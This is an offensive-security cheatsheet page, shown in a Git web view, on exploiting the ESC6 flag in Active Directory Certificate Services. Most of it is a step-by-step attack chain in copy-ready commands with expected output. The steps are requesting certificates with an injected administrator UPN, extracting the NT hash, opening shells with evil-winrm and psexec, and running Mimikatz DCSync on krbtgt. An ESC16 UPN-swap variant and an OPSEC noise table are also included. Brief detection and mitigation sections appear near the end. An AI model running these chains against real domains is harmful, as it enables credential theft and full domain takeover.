daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

esc6-editf-attributesubjectaltname2-flag.md (13643B)


      1 ---
      2 title: "ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 Flag"
      3 description: "certutil -config \"CA-SERVER\\DOMAIN-CA\" -getreg policy\\EditFlags"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs"]
      7 tools: ["Impacket", "Mimikatz", "Rubeus", "Certipy", "BloodHound"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 Flag.md"
     11 ---
     12 # ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 Flag
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | CA-Level Misconfiguration |
     19 | **Difficulty** | Low (pre-patch) / Blocked (post-patch) |
     20 | **Pre-requisites** | `EDITF_ATTRIBUTESUBJECTALTNAME2` flag enabled on CA |
     21 | **Tools** | Certipy, Certify.exe, certutil |
     22 | **OPSEC Noise** | Low — standard cert request |
     23 | **One-liner** | CA-level flag that allows user-specified SANs on ANY template, bypassing template-level restrictions. Largely patched by KB5014754. |
     24 
     25 ***
     26 
     27 ### Quick Check for EDITF Flag
     28 
     29 ```bash
     30 # From Windows
     31 certutil -config "CA-SERVER\DOMAIN-CA" -getreg policy\EditFlags
     32 # Look for EDITF_ATTRIBUTESUBJECTALTNAME2 in the output
     33 
     34 # From Linux (via certipy)
     35 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \
     36   -dc-ip $TARGET -stdout | grep -i 'user specified san'
     37 ```
     38 
     39 ***
     40 
     41 ## What Is ESC6?
     42 
     43 ESC6 is a **CA-level misconfiguration**, not a template-level one. This is a critical distinction from ESC1–4. With ESC1 you needed a template that had `ENROLLEE_SUPPLIES_SUBJECT` set. With ESC6, **that flag on the template doesn't matter at all** — because the CA itself has been told to accept a user-specified SAN on *any* certificate request, regardless of what the template says.
     44 
     45 The flag responsible is `EDITF_ATTRIBUTESUBJECTALTNAME2`, stored in the CA's registry at `HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-NAME>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy`. When this flag is set, **every single template with Client Authentication EKU that low-priv users can enroll in becomes an ESC1 vector** — including the default built-in `User` template.
     46 
     47 Think of it like this: ESC1 is a misconfigured door. ESC6 is the master key that opens every door in the building simultaneously.
     48 
     49 ***
     50 
     51 ## ⚠️ Critical Note — Patched After May 2022
     52 
     53 Microsoft released a patch in **May 2022** (KB5014754) that broke the default exploit path for ESC6. After this patch, even if `EDITF_ATTRIBUTESUBJECTALTNAME2` is set, the CA **enforces strong certificate mapping** and will reject certificates where the SAN doesn't match the requester's actual identity for Kerberos authentication.
     54 
     55 | Environment State | ESC6 Exploitable? |
     56 |---|---|
     57 | Unpatched / pre-May 2022 | ✅ Full ESC6 as described |
     58 | Patched but `StrongCertificateBindingEnforcement = 0` | ✅ Still works |
     59 | Patched but `StrongCertificateBindingEnforcement = 1` (default post-patch) | ⚠️ Partially blocked — Kerberos auth may fail |
     60 | Patched and `StrongCertificateBindingEnforcement = 2` (enforced) | ❌ Blocked |
     61 | ESC16 present (Security Extension disabled) | ✅ ESC6-like attack still works via UPN swap — as seen in your Fluffy box |
     62 
     63 > 💡 This is exactly why your Fluffy box showed `ESC16` — the security extension was disabled, which in modern environments is the **post-patch equivalent of ESC6**. The two are closely related in concept and exploit path.
     64 
     65 ***
     66 
     67 ## Required Conditions
     68 
     69 | Condition | Where to Check |
     70 |-----------|----------------|
     71 | `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set on CA | CA output: `User Specified SAN: Enabled` |
     72 | `Request Disposition: Issue` (no manual approval) | CA output: `Request Disposition: Issue` |
     73 | At least one template with Client Auth EKU enrollable by low-priv users | Any template with `Client Authentication: True` + `Enrollment Rights: Domain Users` |
     74 
     75 ***
     76 
     77 ## Step 0 — Enumeration
     78 
     79 ```bash
     80 # Standard scan
     81 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \
     82   -dc-ip $TARGET -vulnerable -stdout
     83 
     84 # With hash
     85 certipy-ad find -u 'lowpriv@domain.htb' -hashes :NTHASH \
     86   -dc-ip $TARGET -vulnerable -stdout
     87 ```
     88 
     89 ### What Vulnerable ESC6 Output Looks Like
     90 
     91 The vulnerability shows up at the **CA level**, not the template level:
     92 
     93 ```
     94 Certificate Authorities
     95   0
     96     CA Name                             : DOMAIN-CA
     97     DNS Name                            : DC01.domain.htb
     98     Certificate Subject                 : CN=DOMAIN-CA, DC=domain, DC=htb
     99     Web Enrollment                      : Enabled
    100     User Specified SAN                  : Enabled       ← THE key flag
    101     Request Disposition                 : Issue         ← No manual approval
    102     Enforce Encryption for Requests     : Disabled
    103     Permissions
    104       Access Rights
    105         ManageCa      : DOMAIN\Domain Admins
    106         ManageCertificates: DOMAIN\Domain Admins
    107         Enroll        : DOMAIN\Authenticated Users
    108 
    109     [!] Vulnerabilities
    110       ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue.
    111              Does not work after May 2022
    112 ```
    113 
    114 > 💡 Certipy explicitly warns `Does not work after May 2022` in the output. Don't ignore this — check the registry value before investing time in the attack.
    115 
    116 ***
    117 
    118 ## Checking the Registry (if you have access)
    119 
    120 ```bash
    121 # From Linux via Impacket
    122 reg.py 'domain/administrator:Password123!'@$TARGET query \
    123   -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\DOMAIN-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy'
    124 
    125 # Look for:
    126 # EditFlags    REG_DWORD    0x00014...
    127 # Bit 0x00040000 = EDITF_ATTRIBUTESUBJECTALTNAME2 = flag is SET
    128 ```
    129 
    130 ```powershell
    131 # From Windows on the CA server
    132 reg query "HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-NAME>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy"
    133 
    134 # Also check patch status
    135 reg query "HKLM\SYSTEM\CurrentControlSet\Services\Kdc" /v StrongCertificateBindingEnforcement
    136 # 0x0 = not enforced (ESC6 works)
    137 # 0x1 = partial enforcement (may work)
    138 # 0x2 = fully enforced (blocked)
    139 ```
    140 
    141 ***
    142 
    143 ## Full Attack Chain — Linux (Certipy)
    144 
    145 ESC6's exploit is **identical to ESC1** in commands — the difference is you don't need a specially misconfigured template. Any template with Client Auth works, including the built-in `User` template.
    146 
    147 ### Step 1 — Request cert with injected SAN against ANY auth-capable template
    148 
    149 ```bash
    150 # Using the built-in User template — almost always available
    151 certipy-ad req \
    152   -u 'lowpriv@domain.htb' \
    153   -p 'Password123!' \
    154   -dc-ip $TARGET \
    155   -ca 'DOMAIN-CA-NAME' \
    156   -template 'User' \
    157   -upn 'administrator@domain.htb'
    158 
    159 # Output: administrator.pfx
    160 
    161 # If User template doesn't work, try Machine, or any other
    162 # Client Auth template visible in certipy output
    163 certipy-ad req \
    164   -u 'lowpriv@domain.htb' \
    165   -p 'Password123!' \
    166   -dc-ip $TARGET \
    167   -ca 'DOMAIN-CA-NAME' \
    168   -template 'Machine' \
    169   -upn 'administrator@domain.htb'
    170 ```
    171 
    172 **Expected output:**
    173 ```
    174 [*] Requesting certificate via RPC
    175 [*] Successfully requested certificate
    176 [*] Request ID is 22
    177 [*] Got certificate with UPN 'administrator@domain.htb'
    178 [*] Certificate has no object SID
    179 [*] Saving certificate and private key to 'administrator.pfx'
    180 ```
    181 
    182 ***
    183 
    184 ### Step 2 — Authenticate
    185 
    186 ```bash
    187 certipy-ad auth \
    188   -pfx administrator.pfx \
    189   -username administrator \
    190   -domain domain.htb \
    191   -dc-ip $TARGET
    192 
    193 # Output: administrator.ccache + NT hash
    194 ```
    195 
    196 ***
    197 
    198 ### Step 3 — Shell
    199 
    200 ```bash
    201 # Kerberos TGT
    202 export KRB5CCNAME=administrator.ccache
    203 wmiexec.py -k -no-pass DC01.domain.htb
    204 evil-winrm -i DC01.domain.htb -r domain.htb
    205 
    206 # Pass-the-Hash
    207 evil-winrm -i $TARGET -u administrator -H <NTHASH>
    208 psexec.py administrator@$TARGET -hashes :NTHASH
    209 ```
    210 
    211 ***
    212 
    213 ## Full Attack Chain — Windows (Certify.exe + Rubeus)
    214 
    215 ```powershell
    216 # Step 1: Request cert using any Client Auth template
    217 .\Certify.exe request /ca:DC01.domain.local\DOMAIN-CA /template:User /altname:administrator
    218 # Copy cert.pem, convert:
    219 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
    220 # Leave password blank
    221 
    222 # Step 2: Get TGT + NT hash
    223 .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap
    224 
    225 # Step 3: Inject and use
    226 .\Rubeus.exe createnetonly /program:powershell.exe /show
    227 .\Rubeus.exe ptt /ticket:<base64ticket>
    228 Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
    229 ```
    230 
    231 ***
    232 
    233 ## How to SET the Flag (Red Team / Lab Setup)
    234 
    235 If you have CA admin rights and want to demonstrate the vulnerability in a lab:
    236 
    237 ```powershell
    238 # On the CA server — SET the flag
    239 certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
    240 net stop certsvc && net start certsvc
    241 
    242 # To UNSET (remediation)
    243 certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
    244 net stop certsvc && net start certsvc
    245 ```
    246 
    247 ***
    248 
    249 ## ESC6 vs ESC1 — Key Differences
    250 
    251 | | ESC1 | ESC6 |
    252 |---|---|---|
    253 | **Where misconfiguration lives** | Certificate Template | **Certificate Authority** |
    254 | **Flag responsible** | `ENROLLEE_SUPPLIES_SUBJECT` on template | `EDITF_ATTRIBUTESUBJECTALTNAME2` on CA |
    255 | **Templates affected** | Only the specific misconfigured template | **Every** Client Auth template on that CA |
    256 | **Requires specific template** | ✅ Must find the ESC1 template | ❌ Any Client Auth template works |
    257 | **Post-May 2022 patch** | Still works (template-level) | ⚠️ May be blocked |
    258 | **Certipy `-upn` flag** | ✅ Same | ✅ Same |
    259 | **Modern equivalent** | — | **ESC16** (Security Extension disabled) |
    260 
    261 ***
    262 
    263 ## ESC6 → ESC16 Connection (Relevant to Your Fluffy Box)
    264 
    265 Your Fluffy box had `ESC16: Security Extension is disabled`. This is the **post-patch spiritual successor to ESC6**. The exploit path is almost identical — but instead of relying on the CA accepting a user-specified SAN at enrollment time, you:
    266 
    267 1. Find an account you have `GenericWrite` over (e.g., `ca_svc`)
    268 2. **Modify that account's UPN** to match the target (e.g., `administrator`)
    269 3. Request a cert from **any Client Auth template** using that account
    270 4. **Restore the UPN** immediately after
    271 5. Authenticate — the cert was issued with `UPN: administrator` embedded
    272 
    273 ```bash
    274 # What you did on Fluffy — ESC16 chain
    275 certipy-ad account -u winrm_svc@fluffy.htb -hashes ... \
    276   -user ca_svc -upn administrator update           # 1. Swap UPN
    277 
    278 certipy-ad req -u ca_svc -hashes ... \
    279   -ca fluffy-DC01-CA -template User                # 2. Request cert
    280 
    281 certipy-ad account -u winrm_svc@fluffy.htb -hashes ... \
    282   -user ca_svc -upn ca_svc@fluffy.htb update       # 3. Restore UPN
    283 
    284 certipy-ad auth -pfx administrator.pfx \
    285   -u administrator -domain fluffy.htb -dc-ip $TARGET  # 4. Auth
    286 ```
    287 
    288 This is covered fully in the ESC16 section later in the series.
    289 
    290 ***
    291 
    292 ## Detection Indicators
    293 
    294 - **Certipy / Certify output:** `User Specified SAN: Enabled` in CA section
    295 - **Registry:** `EDITF_ATTRIBUTESUBJECTALTNAME2` bit set in `EditFlags` value
    296 - **Event ID 4887** — Certificate issued where Subject differs from requester
    297 - **Microsoft Defender for Identity** — Has a built-in detection for `ESC6` flagged as "Edit vulnerable Certificate Authority setting"
    298 
    299 ***
    300 
    301 ## Mitigation
    302 
    303 - **Unset the flag** immediately on any CA where it is enabled:
    304   ```powershell
    305   certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
    306   net stop certsvc && net start certsvc
    307   ```
    308 - **Enforce strong certificate binding** — set `StrongCertificateBindingEnforcement = 2` in the KDC registry key after ensuring all certificates have been re-issued with objectSID extensions
    309 - **Apply KB5014754** if not already patched — this forces the DC to require the objectSID extension in certificates for Kerberos auth
    310 - **Audit CA configuration regularly** — include CA-level flags in your ADCS security reviews, not just template-level settings
    311 
    312 ***
    313 
    314 ## OPSEC Considerations
    315 
    316 | Action | Log Generated | Noise Level |
    317 |--------|--------------|-------------|
    318 | Certipy enumeration | LDAP queries | 🟢 Low |
    319 | certutil flag check | Event ID 4688 (process creation) | 🟢 Low |
    320 | Certificate request | Event ID 4886/4887 | 🟢 Low |
    321 
    322 > 💡 ESC6 is low noise because it uses standard enrollment. However, post-patch, it produces warning events when the KDC detects a SAN that doesn't match the requester.
    323 
    324 Sources
    325  Active Directory Certificate Attack (ADCS – ESC6) - RBT Security https://www.rbtsec.com/blog/active-directory-certificate-attack-adcs-esc6/
    326  ESC6 - Pentest Everything - GitBook https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adcs/esc6
    327  Common ADCS Vulnerabilities: Logging, Exploitation ... - Lares Labs https://labs.lares.com/adcs-exploits-investigations-pt2/
    328  Certificates - Microsoft Defender for Identity https://learn.microsoft.com/en-us/defender-for-identity/security-posture-assessments/certificates
    329  ADCS Attack Paths in BloodHound — Part 3 - Blog - SpecterOps https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb00856ac
    330  06 ‐ Privilege Escalation · ly4k/Certipy Wiki - GitHub https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation
    331  AD CS Security: Understanding and Exploiting ESC Techniques https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/
    332  Attacking AD CS ESC Vulnerabilities Using Metasploit https://rapid7.github.io/metasploit-framework/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html
    333  AD CS Misconfigurations - Structured https://structured.com/blog/ad-cs-misconfigurations/
    334  Certificate templates | The Hacker Recipes https://www.thehacker.recipes/ad/movement/adcs/certificate-templates